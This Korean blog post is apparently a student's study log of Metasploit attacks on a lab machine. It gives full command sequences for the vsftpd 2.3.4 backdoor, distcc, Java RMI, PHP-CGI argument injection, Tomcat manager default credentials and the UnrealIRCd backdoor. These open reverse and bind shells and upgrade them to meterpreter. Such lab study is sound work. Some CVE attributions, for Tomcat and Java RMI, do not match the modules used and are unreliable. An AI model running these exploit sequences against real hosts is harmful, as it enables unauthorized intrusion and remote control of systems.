System Security DAY_018 CVE , OSVDB , vsftpd_234 Backdoor , distcc_exec , Java RMI , php_cgi_arg_injection , unreal_ircd_3281_backdoor , meterpreter 공격 , Metaploit , 시스템 보안 , 시스템 해킹
배울내용 :
CVE
OSVDB
vsftpd_234 Backdoor
distcc_exec
Java RMI
php_cgi_arg_injection
unreal_ircd_3281_backdoor
meterpreter 공격
Metaploit
시스템 보안
시스템 해킹
제가 지금 부터 작성하는 모든글은 제가 공부기록용이기 때문에 정확하지 않을수 있음을 알려드립니다.
틀린게 있으면 댓글로 써주시면 고치겠습니다.
오늘은 취약점 몇가지 알아볼것이다 오늘알아보는것들은
인간의 몸의 부위로 비교하면 발톱 때 정도만 알아본다고 보면될것같다
그만큼 취약점이 많다
오늘은 침투 테스팅에 자주 사용되는 오픈 소스 도구인 Metasploit 를 사용할것이다
취약점 1
[ 취약점 : vsftpd_234 Backdoor ]
>CVE-2011-2523
>OSVDB- 73573
vsftpd 2.3.4 서버에 존재하는 특정 백도어 취약점(CVE-2011-2523)
CVE 란?
CVE-2011-2523와 OSVDB-73573: 이들은 vsftpd 2.3.4에서 발견된 보안 취약점을 식별하는 고유 식별자이다
CVE (Common Vulnerabilities and Exposures)는 공개적으로 알려진 보안 취약점과 노출을 식별하기 위한 표준
OSVDB (Open Source Vulnerability Database)는 취약점에 대한 정보를 제공하는 데이터베이스
미스포춘(metaexploit) 불러내서
ㅋㅋ 이번엔 황소가 당첨됬다
use /exploit/unix/ftp/vsftpd_234_backdoor
Metasploit에서 vsftpd 2.3.4 백도어 취약점을 공격하기 위한 모듈을 선택하고
set payload cmd/unix/interact
공격 후 사용할 페이로드를 설정
set rhosts 192.168.10.247
공격 대상의 IP 주소를 설정
exploit
설정된 옵션으로 공격을 시작
이걸 이전에 미스포춘이 포탄 선택하고(use explo...)
포탄 장전하고(set payload)
상대방을 향해 조준하고 (set rhost.....)
발사 (공격 exploit )
한다고 이해하기 쉽게 설명했었다
그러면 exploitable2 Linux 서버는 리눅스이기에 2번 공격해야한다
ctrl + Z 한뒤에 y 해주고
use post/multi/manage/shell_to_meterpreter
sessions 해보면
ID 나온다 그걸 set session 1 해준뒤에
exploit
공격해준다
그러면 meterpreter type의 session 이 열리는데 이걸
session -i 2 로 연결하면
공격이 성공된걸 볼수있다
취약점 2
[ 취약점 : distcc_exec ]
>CVE- 2004-2687
>OSVDB -13378
> use exploit/unix/misc/distcc_exec
> set payload cmd/unix/bind_ruby
> set rhosts 192.168.10.247
> exploit
경로만 조금 틀리뿐 하는방식은 거이 비슷하다
공격후에 다시
Ctrl+Z = y 해주고
sessions -i 하면 3번째꺼가 생김
공격 성공 후의 상호작용:
- w, whoami: 공격이 성공한 후, 공격자는 시스템에서 현재 로그인한 사용자와 실행 중인 프로세스를 확인
- whoami 명령의 결과 daemon이 나오면, 공격자는 시스템의 daemon 사용자 권한을 얻은 것
- Ctrl+Z, sessions -i: 공격자는 세션을 백그라운드로 전환하고, sessions -i 명령으로 활성 세션의 목록을 확인
이제 2차공격
use post/multi/manage/shell_to_meterpreter
set session 3
exploit 하면 2차공격으로 하면 type 이 meterpreter 인 걸로 연결되고
아까처럼 sysinfo 같은것도 가능하다
2차 공격 - Shell을 Meterpreter로 전환:
- use post/multi/manage/shell_to_meterpreter: 이 명령은 기존의 단순 쉘을 Meterpreter 세션으로 전환하는 post-exploitation 모듈선택
- set session 2: 이미 취득한 세션 (여기서는 세션 번호 2)을 대상으로 설정
- 이 과정을 통해 공격자는 더 강력하고 유연한 Meterpreter 세션을 얻어, 대상 시스템에서 추가적인 공격이나 탐색을 수행할 수 있다
03. 취약점
[ 취약점 : Java RMI (Remote Method Invocation ) ]
> CVE- 2020-5327
이거는 최근에 확인된 취약점이라 요즘에써도 쓸수있을만한 공격이다
그리고 다른 공격과 다르게 2차공격이 필요없이 1 차로만 공격해도 된다
use exploit/multi/misc/java_rmi_server
set payload java/meterpreter/reverse_tcp
set rport 1099
set lhosts 192.168.10.100
set lport 4444
exploit
하면 meterpreter 로 바로 연결되는걸 알수있다
04 . 취약점
[ 취약점 : php_cgi_arg_injection ]
>CVE- 2012-1823
이 취약점은 PHP가 "="(등호) 문자가 없는 쿼리 문자열을 제대로 처리하지 못하기 때문에 발생한다.
결과적으로, 원격 공격자는 쿼리 문자열에 명령줄 옵션을 넣어 임의의 코드를 실행할 수 있다.
이건 2가지 방식이있는데 1번 방식이 1번에 되고
2번쨰 방식이 2번 공격해야한다
필자는 번거러운 공격은 싫으니 1번째만 하면 이렇게 된다
use exploit/multi/http/php_cgi_arg_injection
set payload php/meterpreter/reverse_tcp
set rhosts 192.168.10.247
exploit
05. 취약점
[ 취약점 : Tomcat vulnerability ]
> CVE-2023-28708
RemoteIpFilter를 사용할 때 발생하는 정보 유출 문제
이 취약점은 웹 애플리케이션이 업로드된 파일에 대한 스트림을 열었지만
닫지 않을 경우 윈도우 시스템에서 서비스 거부(DoS)를 일으킬 수 있다
이것또한 2023 으로 되어있는걸로보아 최신에 발견된 공격인것같아
이것도 어느 PC에서는 공격이 될수도있다
use exploit/multi/http/tomcat_mgr_deploy
set httpusername tomcat
set httppassword tomcat
set rport 8180
options
set rhosts 192.168.10.247
exploit
payload가 default 가되있어서 위와같이 했지만
안되면 set payload java/shell/reverse_tcp 해준다
06. 취약점
[ unreal_ircd_3281_backdoor ] >CVE - 2009?...?
취약점은 UnrealIRCd라는 오픈 소스 인터넷 릴레이 채팅(IRC) 서버 소프트웨어의 특정 버전에서 발견된 보안 결함
이 취약점은 2009년 11월부터 2010년 6월 12일까지 특정 미러 사이트를 통해 배포된
Unreal IRCd 3.2.8.1 다운로드 아카이브에 추가된 악의적인 백도어다.
use exploit/unix/irc/unreal_ircd_3281_backdoor
set payload cmd/unix/bind_ruby
set rhost 192.168.10.247
exploit
ctrl z -> y
(2차공격)
use post/multi/manage/shell_to_meterpreter
set session 1
exploit
이렇게 하면된다 .
이렇게 한참 많은 범위지만 그래도 중요한 Key 같은것들을 System 보안에서 공부해봤다
향후 더 공부해서 올려보고 하고 당분간은 다른 보안 쪽을 포스팅 하도록 해보겠다
정보보안 보안 전문가가 되기까지 오늘도 화이팅
그럼 20000